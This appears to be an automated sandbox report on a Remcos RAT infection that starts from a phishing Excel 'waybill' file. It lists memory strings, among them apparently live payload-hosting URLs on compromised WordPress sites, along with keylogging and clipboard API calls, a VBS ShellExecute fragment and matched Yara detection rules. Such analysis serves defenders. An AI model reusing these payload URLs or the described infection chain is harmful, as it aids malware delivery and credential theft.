Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.479031238.0000000002089000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: RegAsm.exe, 00000015.00000002.476365629.00000000003AC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/cK
Source: RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://www.msn.com/
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: RegAsm.exe, 00000012.00000002.478910801.0000000000353000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: powershell.exe, 00000016.00000002.958799060.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.958799060.0000000002A74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000016.00000002.958799060.000000000283B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/comments/feed/
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/feed/
Source: powershell.exe, 00000016.00000002.958799060.000000000283B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.958702628.000000000283B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/os/transportment.pfm
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
Source: powershell.exe, 00000016.00000002.958799060.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.958799060.0000000002A74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://asociatiatraditiimaria.ro/wp-json/
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
Source: powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gmpg.org/xfn/11
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: RegAsm.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000016.00000002.958799060.0000000002A7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://new.quranushaiqer.org.sa
Source: powershell.exe, 00000016.00000002.958799060.000000000283B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.958702628.000000000283B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm
Source: powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: RegAsm.exe, 00000012.00000002.479747279.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv4625.tmp.18.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.22:49190 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

16_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

16_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	16_2_004168C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	18_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	18_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	21_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	21_2_004072B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

16_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

16_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 680, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	OLE: Microsoft Excel 2007+
Source: 1E630000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Oi8.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\hq.ax.url			Jump to behavior

Potential malicious VBS script found (suspicious strings)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Dropped file: Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)

Jump to dropped file

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 3116
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 3859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3859
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 3116	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 3859	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3859

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

